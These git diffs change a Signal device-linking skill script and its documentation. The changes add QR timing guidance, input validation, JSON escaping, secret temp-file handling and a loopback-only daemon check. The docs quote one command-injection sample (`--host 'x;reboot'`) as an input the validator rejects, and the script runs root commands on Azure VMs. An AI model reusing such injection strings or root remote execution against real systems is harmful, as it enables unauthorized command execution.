+amplifier-bundle/skills/signal-setup/scripts/signal-setup.sh --host local --no-daemon
+
+# Non-interactive (you have ALREADY opened the scan screen):
+amplifier-bundle/skills/signal-setup/scripts/signal-setup.sh --host local -y --phone +1555...
+```
+
+Run `signal-setup.sh --help` for the full option list.
+
+The skill is **idempotent**: if the host is already linked (detected via
+`signal-cli listAccounts`), it does **not** re-mint — it skips straight to the
+daemon/self-group/post-test verification and exits successfully.
+
+## End-to-end flow
+
+1. **Prereq check** — verifies `signal-cli` (known-good **0.14.5** at
+   `~/.local/bin/signal-cli` → `~/.local/opt/signal-cli-0.14.5/bin/signal-cli`),
+   `qrencode`, and `systemd-run` on the target host; plus the `az` CLI and a
+   local `qrencode` for remote hosts.
+2. **Idempotency probe** — `signal-cli listAccounts` showing `Number: +<phone>`
+   means already linked → skip minting.
+3. **Prompt** — you confirm you are on Signal ▸ Settings ▸ Linked Devices ▸
+   **Link New Device** ▸ camera/scan screen **BEFORE** the QR is minted.
+4. **Mint** — `signal-cli link -n amplihack-<host>` under a transient
+   `systemd-run` unit (`sig-link-<host>`) so it survives the launching shell.
+5. **Render QR in-terminal** — `qrencode -t ANSIUTF8i` immediately. Scan it now.
+6. **Verify linkage** — polls `listAccounts` for `Number: +<phone>`; the
+   transient unit goes `inactive` on success.
+7. **Daemon + self-group + post-test** (optional, on by default) — starts the
+   JSON-RPC daemon on `127.0.0.1:7583`, ensures a self-only group via
+   `updateGroup{name}`, and confirms `send{groupId,message}` returns
+   `{"results":[],"timestamp":...}` (empty `results` is normal success for a
+   self-group).
+
+---
+
+## ⚠️ THE FOUR HARD-WON FACTS (do not lose these)
+
+### 1. The 60-second window (the real root cause)
+
+Signal's device-link **provisioning websocket** to `chat.signal.org` closes
+with **server code 1001 EXACTLY ~60 seconds** after it opens — verified in a
+`signal-cli -vv` trace: `onOpen` → `onClosing(1001)` at **+60s**. A minted link
+QR is therefore valid for only **~60 seconds** from mint. Any delivery path
+slower than a few seconds expires the QR and the phone shows
+**"invalid response from server"**.
+
+This is what caused hours of failures: the QR had been routed through a remote
+Signal daemon (azlin/bastion round-trip = 40–60s), leaving no margin. The fix
+is **zero-latency, in-terminal delivery** so the phone scans a fresh QR within
+a couple of seconds.
+
+### 2. ANSIUTF8i — inverted, for dark terminals
+
+Render with **`qrencode -t ANSIUTF8i`**. The trailing **`i` = inverted**, which
+is **required** so the QR is visible/scannable on **dark** terminal
+backgrounds. Plain `ANSIUTF8` is dark-on-dark and effectively **invisible** on
+dark terminals.
+
+### 3. systemd-run persistence
+
+The `signal-cli link` process runs under a **transient systemd unit**
+(`sig-link-<host>`) via `systemd-run`, so it **survives the launching shell**
+and stays connected for the full window; it exits cleanly on a successful scan.
+
+For **remote** hosts the same unit is launched via
+`az vm run-command invoke ... RunShellScript` calling:
+
+```bash
+systemd-run --unit=sig-link-<host> --uid=azureuser --gid=azureuser \
+  --setenv=HOME=/home/azureuser ...
+```
+
+`run-command` runs as **root**, so `--uid=azureuser --gid=azureuser` is
+**required** so the linked account lands under the `azureuser` home, not root's.
+The script captures the `sgnl://` URI from the link stdout on the VM, returns it,
+and **renders the QR LOCALLY** — the URI (a few hundred bytes of text) travels
+fast; the QR image never leaves your terminal.
+
+### 4. NEVER route the QR through Signal
+
+Do **NOT** deliver the QR as a Signal message/attachment during linking. That is
+the **DEPRECATED slow path** (relay / daemon delivery) that reliably blew the
+60s window. The QR goes to the **terminal**, nowhere else. You must be on the
+phone's scan screen **before** the QR prints.
+
+---
+
+## Verifying linkage manually
+
+- `signal-cli listAccounts` shows `Number: +<phone>`.
+- The `sig-link-<host>` systemd unit becomes `inactive` on success.
+- Trace log `/tmp/scli-<host>.log` shows `Associated with: +<phone>` then
+  `Finishing new device registration`.
+
+## Daemon + self-group + post-test details
+
+- Daemon: `signal-cli -a +<phone> daemon --tcp 127.0.0.1:7583` (loopback, the
+  established amplihack convention — matches `crates/amplihack-signal` and the
+  `amplihack signal setup` command).
+- Self-group: JSON-RPC `updateGroup{account,name}` → returns a `groupId`.
+- Post-test: JSON-RPC `send{account,groupId,message}` → `{"results":[],...}`.
+  An **empty `results` array is expected success** for a self-only group.
+
+This aligns with the existing Rust integration: see
+`crates/amplihack-cli/src/commands/signal/` (`setup.rs` idempotency probes,
+`render.rs`, daemon on `127.0.0.1:7583`) and `docs/SIGNAL_ONBOARDING.md`. This
+skill provides the **zero-latency in-terminal linking loop** that those tools
+assume you have already completed.
+
+---
+
+## ⚠️ Operational gotchas (remote / azlin)
+
+- **azlin SIGPIPE core-dump** — `azlin` is a Rust binary that **aborts
+  (SIGABRT / core-dump) on a broken pipe (SIGPIPE)**. **Never** pipe `azlin`
+  (or `az` output you treat like it) into `grep -q` or any early-closing
+  consumer. **Capture full output first**, then filter. The script follows this
+  rule (`remote_run` captures the whole `az` message before `sed`/`grep`).
+- **One bastion session per host** — only **ONE** bastion/azlin session to a
+  given VM at a time. Concurrent sessions to the same VM core-dump. Do not run
+  this skill against the same host from two places at once.
+- **azlin invocation form**:
+  ```bash
+  azlin connect <host> --resource-group rysweet-linux-vm-pool --no-tmux -y -- "<cmd>"
+  ```
+
+## Prerequisites (install if missing)
+
+- **signal-cli 0.14.5** (known-good) at `~/.local/bin/signal-cli`
+  (symlink → `~/.local/opt/signal-cli-0.14.5/bin/signal-cli`).
+- **qrencode** — `apt-get install -y qrencode` (on the machine that renders the
+  QR: local host, or your local machine for remote linking).
+- **systemd-run / systemctl** — present on the target host.
+- **az CLI** (remote hosts only) with `az vm run-command` permission for the
+  target resource group.
+
+## See also
+
+- `docs/SIGNAL_ONBOARDING.md`, `docs/signal-channel.md`
+- `crates/amplihack-signal/`, `crates/amplihack-cli/src/commands/signal/`

--- a/amplifier-bundle/skills/signal-setup/SKILL.md
+++ b/amplifier-bundle/skills/signal-setup/SKILL.md
@@ -185,6 +185,14 @@ use, and injection** — not web auth. Hardening built into the script:
   These values flow into shell command lines, `az vm run-command` payloads
   (executed as root remotely), and JSON-RPC strings, so malformed input like
   `--host 'x;reboot'` is rejected before use.
+- **Daemon endpoint override (`SIGNAL_SETUP_DAEMON_TCP`).** The local JSON-RPC
+  daemon endpoint defaults to `127.0.0.1:7583` and may be overridden with the
+  `SIGNAL_SETUP_DAEMON_TCP` env var (e.g. to change the loopback port). It is
+  **loopback-allowlist validated (fail-closed)**: only `127.0.0.1`/`localhost`
+  with a numeric `1-65535` port is accepted; routable hosts (`0.0.0.0`, LAN IPs)
+  and IPv6/multi-colon forms are rejected before any daemon is spawned. This
+  enforces the SECURITY.md §6 loopback-only invariant in code, not just by
+  convention.
 - **JSON-RPC escaping.** `--phone`/`--group`/`groupId` are `json_escape`d before
   being embedded in daemon requests, preventing JSON/argument injection.
 - **Secret temp files.** The minted `sgnl://` URI (a ~60s provisioning secret)

--- a/amplifier-bundle/skills/signal-setup/SKILL.md
+++ b/amplifier-bundle/skills/signal-setup/SKILL.md
@@ -199,6 +199,10 @@ use, and injection** — not web auth. Hardening built into the script:
 - **PII.** The phone number lives only in argv/env; note argv is visible via
   `ps` to other local users.
 
+See **[`SECURITY.md`](./SECURITY.md)** for the full threat model, per-input
+allowlist tables, secret temp-file regime, JSON-RPC escaping rules, trust
+anchors, and the security invariants that must not regress.
+
 ---
 
 ## Prerequisites (install if missing)
@@ -214,4 +218,5 @@ use, and injection** — not web auth. Hardening built into the script:
 ## See also
 
 - `docs/SIGNAL_ONBOARDING.md`, `docs/signal-channel.md`
+- [`SECURITY.md`](./SECURITY.md) — security hardening reference for this skill
 - `crates/amplihack-signal/`, `crates/amplihack-cli/src/commands/signal/`

--- a/amplifier-bundle/skills/signal-setup/SKILL.md
+++ b/amplifier-bundle/skills/signal-setup/SKILL.md
@@ -25,7 +25,7 @@ priority_score: 36.0
 
 Link a host (local or remote azlin VM) to Signal for the amplihack Signal
 channel — reliably, in one command, without falling into the 60-second trap
-that caused hours of failures.
+that makes slow QR delivery fail.
 
 ## When to invoke
 
@@ -82,7 +82,7 @@ daemon/self-group/post-test verification and exits successfully.
 
 ---
 
-## ⚠️ THE FOUR HARD-WON FACTS (do not lose these)
+## ⚠️ Critical Signal-linking invariants
 
 ### 1. The 60-second window (the real root cause)
 
@@ -93,10 +93,10 @@ QR is therefore valid for only **~60 seconds** from mint. Any delivery path
 slower than a few seconds expires the QR and the phone shows
 **"invalid response from server"**.
 
-This is what caused hours of failures: the QR had been routed through a remote
-Signal daemon (azlin/bastion round-trip = 40–60s), leaving no margin. The fix
-is **zero-latency, in-terminal delivery** so the phone scans a fresh QR within
-a couple of seconds.
+Routing the QR through a remote Signal daemon (azlin/bastion round-trip =
+40–60s) leaves no useful margin and causes expiry. The fix is
+**zero-latency, in-terminal delivery** so the phone scans a fresh QR within a
+couple of seconds.
 
 ### 2. ANSIUTF8i — inverted, for dark terminals
 

--- a/amplifier-bundle/skills/signal-setup/SKILL.md
+++ b/amplifier-bundle/skills/signal-setup/SKILL.md
@@ -59,6 +59,19 @@ The skill is **idempotent**: if the host is already linked (detected via
 `signal-cli listAccounts`), it does **not** re-mint — it skips straight to the
 daemon/self-group/post-test verification and exits successfully.
 
+Environment overrides:
+
+- `SIGNAL_PHONE` — default `--phone`.
+- `SIGNAL_SETUP_RG` — default Azure resource group (`rysweet-linux-vm-pool`).
+- `SIGNAL_SETUP_AZ_TIMEOUT_SECONDS` — `az vm run-command` timeout (default 90).
+- `SIGNAL_SETUP_LOCAL_TIMEOUT_SECONDS` — local `signal-cli` probe timeout
+  (default 10).
+- `SIGNAL_SETUP_DAEMON_WAIT_ATTEMPTS` — half-second daemon/URI poll attempts
+  (default 20).
+- `SIGNAL_SETUP_RPC_TIMEOUT_SECONDS` — JSON-RPC `nc` timeout (default 15).
+- `SIGNAL_SETUP_DAEMON_TCP` — loopback daemon endpoint (default
+  `127.0.0.1:7583`; host must stay `127.0.0.1`/`localhost`).
+
 ## End-to-end flow
 
 1. **Prereq check** — verifies `signal-cli` (known-good **0.14.5** at

--- a/amplifier-bundle/skills/signal-setup/SKILL.md
+++ b/amplifier-bundle/skills/signal-setup/SKILL.md
@@ -138,7 +138,8 @@ phone's scan screen **before** the QR prints.
 
 - `signal-cli listAccounts` shows `Number: +<phone>`.
 - The `sig-link-<host>` systemd unit becomes `inactive` on success.
-- Trace log `/tmp/scli-<host>.log` shows `Associated with: +<phone>` then
+- Trace log `/tmp/scli-<host>-<run-token>.log` (the exact path is printed on a
+  verification failure) shows `Associated with: +<phone>` then
   `Finishing new device registration`.
 
 ## Daemon + self-group + post-test details

--- a/amplifier-bundle/skills/signal-setup/scripts/signal-setup.sh
+++ b/amplifier-bundle/skills/signal-setup/scripts/signal-setup.sh
@@ -158,7 +158,9 @@ validate() { # validate <label> <value> <regex>
   case "$2" in
     "") die "$1 must not be empty" ;;
   esac
-  printf '%s' "$2" | grep -Eq "$3" \
+  # Bash's [[ =~ ]] applies the ERE natively, avoiding a grep subprocess per
+  # call. $3 stays unquoted so it is treated as a pattern, not a literal.
+  [[ "$2" =~ $3 ]] \
     || die "$1 contains invalid characters: '$2' (allowed: $3)"
 }
 
@@ -258,7 +260,7 @@ already_linked() {
   fi
   # Prefer an explicit phone match when --phone given; otherwise any Number line.
   if [ -n "$PHONE" ]; then
-    printf '%s\n' "$accounts" | grep -F "Number: $PHONE" >/dev/null 2>&1 && printf '%s' "$PHONE"
+    [[ "$accounts" == *"Number: $PHONE"* ]] && printf '%s' "$PHONE"
   else
     printf '%s\n' "$accounts" | sed -n 's/.*Number: \(+[0-9][0-9]*\).*/\1/p' | head -n1
   fi
@@ -279,7 +281,7 @@ mint_local() {
     /bin/bash -c "$SIGNAL_CLI_REMOTE -vv --log-file $LOG_FILE link -n $NAME > $URI_FILE 2>&1" \
     >/dev/null 2>&1
   local _i
-  for _i in $(seq 1 20); do
+  for ((_i = 1; _i <= 20; _i++)); do
     grep -q '^sgnl://' "$URI_FILE" 2>/dev/null && break
     sleep 0.5
   done
@@ -315,7 +317,7 @@ REMOTE
 verify_linkage() {
   info "[4/6] Verifying linkage (up to ${WINDOW_SECONDS}s)..."
   local _i num unit_state
-  for _i in $(seq 1 "$WINDOW_SECONDS"); do
+  for ((_i = 1; _i <= WINDOW_SECONDS; _i++)); do
     num="$(already_linked)"
     if [ -n "$num" ]; then
       # The transient unit exits (inactive) on success.
@@ -353,7 +355,7 @@ daemon_group_posttest() {
   if ! daemon_up; then
     "$sigcli" -a "$PHONE" daemon --tcp "$DAEMON_TCP" >/tmp/signal-daemon-"$HOST".log 2>&1 &
     local _i
-    for _i in $(seq 1 20); do
+    for ((_i = 1; _i <= 20; _i++)); do
       daemon_up && break
       sleep 0.5
     done

--- a/amplifier-bundle/skills/signal-setup/scripts/signal-setup.sh
+++ b/amplifier-bundle/skills/signal-setup/scripts/signal-setup.sh
@@ -95,8 +95,6 @@ FLOW:
 USAGE
 }
 
-# Run a command ON the target host (local => direct, remote => az run-command).
-# Captures FULL output first (never pipes az/azlin into early-closing readers).
 # JSON-escape a raw string for safe embedding inside a JSON string value.
 json_escape() { # json_escape <raw>
   local s="$1"
@@ -113,6 +111,15 @@ rpc() { # rpc <method> <params-json>
   printf '{"jsonrpc":"2.0","method":"%s","params":%s,"id":1}\n' "$1" "$2"
 }
 
+# True iff the signal-cli JSON-RPC daemon is accepting connections on DAEMON_TCP.
+# Derives the /dev/tcp path from DAEMON_TCP so the endpoint is defined once.
+daemon_up() {
+  (exec 3<>"/dev/tcp/${DAEMON_TCP/:/\/}") 2>/dev/null
+}
+
+# Run a command ON the remote target host via az run-command. Captures FULL
+# output first (never pipes az/azlin into an early-closing reader — SIGPIPE
+# core-dumps azlin), then returns it for the caller to filter.
 remote_run() {
   local script="$1" out
   out="$(az vm run-command invoke -g "$RESOURCE_GROUP" -n "$HOST" \
@@ -343,26 +350,27 @@ daemon_group_posttest() {
     return 0
   fi
 
-  if ! (exec 3<>/dev/tcp/127.0.0.1/7583) 2>/dev/null; then
+  if ! daemon_up; then
     "$sigcli" -a "$PHONE" daemon --tcp "$DAEMON_TCP" >/tmp/signal-daemon-"$HOST".log 2>&1 &
     local _i
     for _i in $(seq 1 20); do
-      (exec 3<>/dev/tcp/127.0.0.1/7583) 2>/dev/null && break
+      daemon_up && break
       sleep 0.5
     done
   fi
-  (exec 3<>/dev/tcp/127.0.0.1/7583) 2>/dev/null \
+  daemon_up \
     || { warn "  Daemon did not come up on $DAEMON_TCP; skipping post-test."; return 0; }
   ok "  Daemon reachable on $DAEMON_TCP"
 
   command -v nc >/dev/null 2>&1 || { warn "  'nc' not available; skipping JSON-RPC self-group post-test."; return 0; }
 
   info "[6/6] Ensuring self-group '$GROUP_NAME' + post-test ..."
-  local resp group_id acct_j group_j
+  local resp group_id acct_j group_j nc_host nc_port
+  nc_host="${DAEMON_TCP%:*}"; nc_port="${DAEMON_TCP##*:}"
   acct_j="$(json_escape "$PHONE")"
   group_j="$(json_escape "$GROUP_NAME")"
   resp="$(rpc updateGroup "{\"account\":\"$acct_j\",\"name\":\"$group_j\"}" \
-    | timeout 15 nc 127.0.0.1 7583 2>/dev/null | head -n1)"
+    | timeout 15 nc "$nc_host" "$nc_port" 2>/dev/null | head -n1)"
   group_id="$(printf '%s' "$resp" | sed -n 's/.*"groupId":"\([^"]*\)".*/\1/p')"
   if [ -z "$group_id" ]; then
     warn "  Could not obtain groupId from updateGroup response:"
@@ -374,7 +382,7 @@ daemon_group_posttest() {
   local gid_j
   gid_j="$(json_escape "$group_id")"
   resp="$(rpc send "{\"account\":\"$acct_j\",\"groupId\":\"$gid_j\",\"message\":\"amplihack signal-setup: link verified\"}" \
-    | timeout 15 nc 127.0.0.1 7583 2>/dev/null | head -n1)"
+    | timeout 15 nc "$nc_host" "$nc_port" 2>/dev/null | head -n1)"
   # Empty results array is NORMAL/success for a self-only group.
   if printf '%s' "$resp" | grep -q '"results":\[\]'; then
     ok "  Post-test OK: {\"results\":[],...} (empty results = success for self-group)"

--- a/amplifier-bundle/skills/signal-setup/scripts/signal-setup.sh
+++ b/amplifier-bundle/skills/signal-setup/scripts/signal-setup.sh
@@ -97,6 +97,17 @@ USAGE
 
 # Run a command ON the target host (local => direct, remote => az run-command).
 # Captures FULL output first (never pipes az/azlin into early-closing readers).
+# JSON-escape a raw string for safe embedding inside a JSON string value.
+json_escape() { # json_escape <raw>
+  local s="$1"
+  s="${s//\\/\\\\}"   # backslash first
+  s="${s//\"/\\\"}"   # double-quote
+  s="${s//$'\n'/\\n}" # newline
+  s="${s//$'\r'/\\r}" # carriage return
+  s="${s//$'\t'/\\t}" # tab
+  printf '%s' "$s"
+}
+
 # Build a JSON-RPC request line for the signal-cli TCP daemon.
 rpc() { # rpc <method> <params-json>
   printf '{"jsonrpc":"2.0","method":"%s","params":%s,"id":1}\n' "$1" "$2"
@@ -131,6 +142,30 @@ done
 
 [ -n "$HOST" ] || { usage; die "--host is required"; }
 
+# --------------------------------------------------------------------------- #
+# Input validation — fail closed. These values flow into shell command lines,
+# az run-command payloads (executed as root remotely), and JSON-RPC strings,
+# so they MUST be strictly constrained to prevent command/argument injection.
+# --------------------------------------------------------------------------- #
+validate() { # validate <label> <value> <regex>
+  case "$2" in
+    "") die "$1 must not be empty" ;;
+  esac
+  printf '%s' "$2" | grep -Eq "$3" \
+    || die "$1 contains invalid characters: '$2' (allowed: $3)"
+}
+
+# Hostnames / VM names: DNS-label + Azure resource charset.
+validate "--host" "$HOST" '^[A-Za-z0-9._-]+$'
+# Azure resource group naming charset.
+validate "--resource-group" "$RESOURCE_GROUP" '^[A-Za-z0-9._()-]+$'
+# Self-group name: printable, no shell/JSON metacharacters or whitespace tricks.
+validate "--group" "$GROUP_NAME" '^[A-Za-z0-9._ -]+$'
+# Phone (when provided): strict E.164.
+if [ -n "$PHONE" ]; then
+  validate "--phone" "$PHONE" '^\+[1-9][0-9]{7,14}$'
+fi
+
 # Auto-detect mode if not forced.
 if [ -z "$MODE" ]; then
   if [ "$HOST" = "local" ] || [ "$HOST" = "localhost" ] || [ "$HOST" = "$(hostname)" ]; then
@@ -142,8 +177,28 @@ fi
 
 NAME="amplihack-$HOST"
 UNIT="sig-link-$HOST"
-URI_FILE="/tmp/slink-$HOST.out"
-LOG_FILE="/tmp/scli-$HOST.log"
+
+# Secret handling: the minted sgnl:// link URI is a short-lived provisioning
+# secret and the -vv trace log can capture identity material. Restrict every
+# byte we write:
+#   * umask 077 so any file we create is owner-only.
+#   * Unguessable, per-run path suffix (defeats /tmp symlink pre-creation and
+#     disclosure to other local users on a predictable path).
+#   * 0600 mode and trap-based cleanup on exit.
+umask 077
+RUN_TOKEN="$(date +%s)-$$-${RANDOM}${RANDOM}"
+URI_FILE="/tmp/slink-${HOST}-${RUN_TOKEN}.out"
+LOG_FILE="/tmp/scli-${HOST}-${RUN_TOKEN}.log"
+
+cleanup_secrets() {
+  if [ "$MODE" = "local" ]; then
+    rm -f "$URI_FILE" "$LOG_FILE" 2>/dev/null
+    sudo rm -f "$URI_FILE" "$LOG_FILE" 2>/dev/null
+  else
+    remote_run "rm -f $URI_FILE $LOG_FILE" >/dev/null 2>&1
+  fi
+}
+trap cleanup_secrets EXIT INT TERM
 
 info "=== signal-setup: host=$HOST mode=$MODE unit=$UNIT ==="
 
@@ -223,6 +278,7 @@ mint_remote() {
   # linked account lands under the azureuser home, not root's.
   local script out
   script="$(cat <<REMOTE
+umask 077
 systemctl reset-failed $UNIT 2>/dev/null
 systemctl stop $UNIT 2>/dev/null
 rm -f $URI_FILE $LOG_FILE
@@ -295,8 +351,10 @@ daemon_group_posttest() {
   command -v nc >/dev/null 2>&1 || { warn "  'nc' not available; skipping JSON-RPC self-group post-test."; return 0; }
 
   info "[6/6] Ensuring self-group '$GROUP_NAME' + post-test ..."
-  local resp group_id
-  resp="$(rpc updateGroup "{\"account\":\"$PHONE\",\"name\":\"$GROUP_NAME\"}" \
+  local resp group_id acct_j group_j
+  acct_j="$(json_escape "$PHONE")"
+  group_j="$(json_escape "$GROUP_NAME")"
+  resp="$(rpc updateGroup "{\"account\":\"$acct_j\",\"name\":\"$group_j\"}" \
     | timeout 15 nc 127.0.0.1 7583 2>/dev/null | head -n1)"
   group_id="$(printf '%s' "$resp" | sed -n 's/.*"groupId":"\([^"]*\)".*/\1/p')"
   if [ -z "$group_id" ]; then
@@ -306,7 +364,9 @@ daemon_group_posttest() {
   fi
   ok "  self-group id: $group_id"
 
-  resp="$(rpc send "{\"account\":\"$PHONE\",\"groupId\":\"$group_id\",\"message\":\"amplihack signal-setup: link verified\"}" \
+  local gid_j
+  gid_j="$(json_escape "$group_id")"
+  resp="$(rpc send "{\"account\":\"$acct_j\",\"groupId\":\"$gid_j\",\"message\":\"amplihack signal-setup: link verified\"}" \
     | timeout 15 nc 127.0.0.1 7583 2>/dev/null | head -n1)"
   # Empty results array is NORMAL/success for a self-only group.
   if printf '%s' "$resp" | grep -q '"results":\[\]'; then
@@ -359,6 +419,15 @@ main() {
   printf '############################################################\n\n' >&2
   qrencode -t ANSIUTF8i -m "$QR_MARGIN" "$uri"
   printf '\n(host=%s unit=%s minted=%s)\n' "$HOST" "$UNIT" "$(date -u +%H:%M:%SZ)" >&2
+
+  # The URI is now on-screen; delete the on-disk copy of the secret immediately
+  # rather than leaving it readable for the whole provisioning window.
+  if [ "$MODE" = "local" ]; then
+    rm -f "$URI_FILE" 2>/dev/null; sudo rm -f "$URI_FILE" 2>/dev/null
+  else
+    remote_run "rm -f $URI_FILE" >/dev/null 2>&1
+  fi
+  uri=""
 
   verify_linkage || die "Linkage not verified. Re-run to mint a fresh QR (the old one has expired)."
 

--- a/amplifier-bundle/skills/signal-setup/scripts/signal-setup.sh
+++ b/amplifier-bundle/skills/signal-setup/scripts/signal-setup.sh
@@ -5,36 +5,9 @@
 # Generalizes the proven zero-latency in-terminal QR linking loop into a single
 # idempotent, reusable command for LOCAL and REMOTE (azlin VM) hosts.
 #
-# THE HARD-WON FACTS (see SKILL.md for the full write-up):
-#
-#   * 60-SECOND WINDOW — Signal's device-link provisioning websocket to
-#     chat.signal.org closes with server code 1001 EXACTLY ~60s after it opens.
-#     A minted link QR is therefore valid for only ~60s. Any delivery path
-#     slower than a few seconds expires it ("invalid response from server").
-#     => We mint and render the QR in-terminal with ZERO delivery latency.
-#
-#   * ANSIUTF8i — render with `qrencode -t ANSIUTF8i` (trailing "i" = inverted).
-#     Plain ANSIUTF8 is dark-on-dark and INVISIBLE / unscannable on dark
-#     terminal backgrounds. The inverted variant is required.
-#
-#   * NEVER route the QR through a Signal message/attachment during linking.
-#     That is the DEPRECATED slow path (relay/daemon delivery = 40-60s) which
-#     reliably blew the 60s window. QR goes to the TERMINAL, nowhere else.
-#
-#   * systemd-run persistence — the `signal-cli link` process runs under a
-#     transient systemd unit (sig-link-<host>) so it survives the launching
-#     shell and stays connected for the full window; it exits on a successful
-#     scan. Remote hosts launch the same unit via `az vm run-command`.
-#
-# OPERATIONAL GOTCHAS (remote hosts):
-#   (a) azlin is a Rust binary that ABORTS (SIGABRT/core-dump) on SIGPIPE.
-#       NEVER pipe azlin into `grep -q` or any early-closing consumer.
-#       Capture full output first, then filter.
-#   (b) Only ONE bastion session to a given host at a time. Concurrent
-#       azlin/az sessions to the same VM core-dump.
-#   (c) azlin invocation form:
-#         azlin connect <host> --resource-group rysweet-linux-vm-pool \
-#           --no-tmux -y -- "<cmd>"
+# See SKILL.md for the operational invariants: the ~60s Signal provisioning
+# window, ANSIUTF8i QR rendering, terminal-only QR delivery, systemd-run
+# persistence, and azlin/bastion gotchas.
 #
 set -uo pipefail
 
@@ -44,10 +17,11 @@ set -uo pipefail
 SIGNAL_CLI="${SIGNAL_CLI:-$HOME/.local/bin/signal-cli}"
 SIGNAL_CLI_REMOTE="/home/azureuser/.local/bin/signal-cli"
 RESOURCE_GROUP="${SIGNAL_SETUP_RG:-rysweet-linux-vm-pool}"
-DAEMON_TCP="127.0.0.1:7583"
+DAEMON_TCP="${SIGNAL_SETUP_DAEMON_TCP:-127.0.0.1:7583}"
 QR_MARGIN=2
 WINDOW_SECONDS=55   # advertise a hair under 60 so the user is never late
 AZ_RUN_TIMEOUT_SECONDS="${SIGNAL_SETUP_AZ_TIMEOUT_SECONDS:-15}"
+LOCAL_SIGNAL_TIMEOUT_SECONDS="${SIGNAL_SETUP_LOCAL_TIMEOUT_SECONDS:-10}"
 
 HOST=""
 PHONE="${SIGNAL_PHONE:-}"
@@ -116,6 +90,7 @@ rpc() { # rpc <method> <params-json>
 # True iff the signal-cli JSON-RPC daemon is accepting connections on DAEMON_TCP.
 # Derives the /dev/tcp path from DAEMON_TCP so the endpoint is defined once.
 daemon_up() {
+  [ "${SIGNAL_SETUP_TEST_DAEMON_UP:-0}" = "1" ] && return 0
   (exec 3<>"/dev/tcp/${DAEMON_TCP/:/\/}") 2>/dev/null
 }
 
@@ -126,7 +101,12 @@ remote_run() {
   local script="$1" out
   out="$(timeout "$AZ_RUN_TIMEOUT_SECONDS" az vm run-command invoke -g "$RESOURCE_GROUP" -n "$HOST" \
     --command-id RunShellScript --scripts "$script" \
-    --query 'value[0].message' -o tsv 2>/dev/null)" || return 1
+    --query 'value[0].message' -o tsv 2>&1)"
+  local rc=$?
+  if [ "$rc" -ne 0 ]; then
+    [ -n "$out" ] && printf '%s\n' "$out" >&2
+    return "$rc"
+  fi
   printf '%s' "$out"
 }
 
@@ -214,7 +194,7 @@ DAEMON_LOG="/tmp/signal-daemon-${HOST}-${RUN_TOKEN}.log"
 cleanup_secrets() {
   if [ "$MODE" = "local" ]; then
     rm -f "$URI_FILE" "$LOG_FILE" "$DAEMON_LOG" 2>/dev/null
-    sudo rm -f "$URI_FILE" "$LOG_FILE" 2>/dev/null
+    sudo rm -f "$URI_FILE" "$LOG_FILE" "$DAEMON_LOG" 2>/dev/null
   else
     remote_run "rm -f $URI_FILE $LOG_FILE" >/dev/null 2>&1
   fi
@@ -261,16 +241,24 @@ already_linked() {
   # Prints the linked number if the host already has an account, else nothing.
   local accounts
   if [ "$MODE" = "local" ]; then
-    accounts="$("$SIGNAL_CLI" listAccounts 2>/dev/null)"
+    accounts="$(timeout "$LOCAL_SIGNAL_TIMEOUT_SECONDS" "$SIGNAL_CLI" listAccounts 2>&1)" || return 2
   else
-    accounts="$(remote_run "$SIGNAL_CLI_REMOTE listAccounts 2>/dev/null")"
+    accounts="$(remote_run "out=\$($SIGNAL_CLI_REMOTE listAccounts 2>&1); rc=\$?; if [ \$rc -ne 0 ]; then echo __SIGNAL_CLI_FAILED__\$rc; printf '%s\n' \"\$out\"; else printf '%s\n' \"\$out\"; fi")" || return 2
+    case "$accounts" in
+      *__SIGNAL_CLI_FAILED__*) printf '%s\n' "$accounts" >&2; return 2 ;;
+    esac
   fi
   # Prefer an explicit phone match when --phone given; otherwise any Number line.
+  # NOTE: a non-matching [[ ]] test must NOT leak exit status 1 as the function's
+  # return code — the caller ("$(already_linked)" || die) reserves non-zero for
+  # a genuine probe FAILURE (return 2 above). "Probe succeeded, not linked yet"
+  # is success with empty output, so force an explicit return 0 below.
   if [ -n "$PHONE" ]; then
     [[ "$accounts" == *"Number: $PHONE"* ]] && printf '%s' "$PHONE"
   else
     printf '%s\n' "$accounts" | sed -n 's/.*Number: \(+[0-9][0-9]*\).*/\1/p' | head -n1
   fi
+  return 0
 }
 
 # --------------------------------------------------------------------------- #
@@ -331,7 +319,7 @@ verify_linkage() {
   local num unit_state deadline now
   deadline="$(($(date +%s) + WINDOW_SECONDS))"
   while [ "$(date +%s)" -lt "$deadline" ]; do
-    num="$(already_linked)"
+    num="$(already_linked)" || { warn "  Could not query linked accounts yet; retrying."; num=""; }
     if [ -n "$num" ]; then
       # The transient unit exits (inactive) on success.
       if [ "$MODE" = "local" ]; then
@@ -356,18 +344,11 @@ verify_linkage() {
 # --------------------------------------------------------------------------- #
 # Step 5+6: Daemon + self-group + post-test (JSON-RPC on 127.0.0.1:7583)
 # --------------------------------------------------------------------------- #
-daemon_group_posttest() {
-  [ -n "$PHONE" ] || { warn "  --phone not set; skipping daemon/group/post-test."; return 0; }
-  info "[5/6] Ensuring JSON-RPC daemon on $DAEMON_TCP ..."
-
-  local sigcli
-  if [ "$MODE" = "local" ]; then sigcli="$SIGNAL_CLI"; else sigcli="$SIGNAL_CLI_REMOTE"; fi
-
-  if [ "$MODE" = "remote" ]; then
-    local acct_j group_j script out
-    acct_j="$(json_escape "$PHONE")"
-    group_j="$(json_escape "$GROUP_NAME")"
-    script="$(cat <<REMOTE
+remote_daemon_group_posttest() {
+  local sigcli="$1" acct_j group_j script out
+  acct_j="$(json_escape "$PHONE")"
+  group_j="$(json_escape "$GROUP_NAME")"
+  script="$(cat <<REMOTE
 daemon_up() { (exec 3<>/dev/tcp/127.0.0.1/7583) 2>/dev/null; }
 if ! daemon_up; then
   systemctl reset-failed $DAEMON_UNIT 2>/dev/null
@@ -389,17 +370,18 @@ case "\$resp" in
 esac
 REMOTE
 )"
-    out="$(remote_run "$script")" || { warn "  Remote daemon/group/post-test failed to run."; return 0; }
-    case "$out" in
-      *POST_TEST_OK*) ok "  Remote daemon reachable; post-test OK: {\"results\":[],...}" ;;
-      *DAEMON_DOWN*) warn "  Remote daemon did not come up on $DAEMON_TCP; skipping post-test." ;;
-      *NC_MISSING*) warn "  Remote 'nc' not available; skipping JSON-RPC self-group post-test." ;;
-      *GROUP_ID_MISSING*) warn "  Remote updateGroup did not return groupId: $out" ;;
-      *) warn "  Remote post-test response (verify manually): $out" ;;
-    esac
-    return 0
-  fi
+  out="$(remote_run "$script")" || { warn "  Remote daemon/group/post-test failed to run."; return 0; }
+  case "$out" in
+    *POST_TEST_OK*) ok "  Remote daemon reachable; post-test OK: {\"results\":[],...}" ;;
